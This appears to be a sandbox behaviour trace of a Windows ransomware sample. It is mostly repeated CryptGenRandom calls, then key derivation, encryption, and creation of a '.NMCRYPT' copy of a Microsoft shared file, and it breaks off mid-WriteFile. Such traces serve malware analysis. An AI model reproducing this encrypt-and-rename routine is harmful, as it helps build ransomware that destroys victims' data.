[0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.739] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.740] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.741] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.742] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.743] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.743] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0144.743] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.743] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad2b8) returned 1 [0144.743] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.743] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.743] wcslen (_String="\\\\?\\") returned 0x4 [0144.743] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad438) returned 1 [0144.743] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.744] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0144.744] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=1100592) returned 1 [0144.744] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, 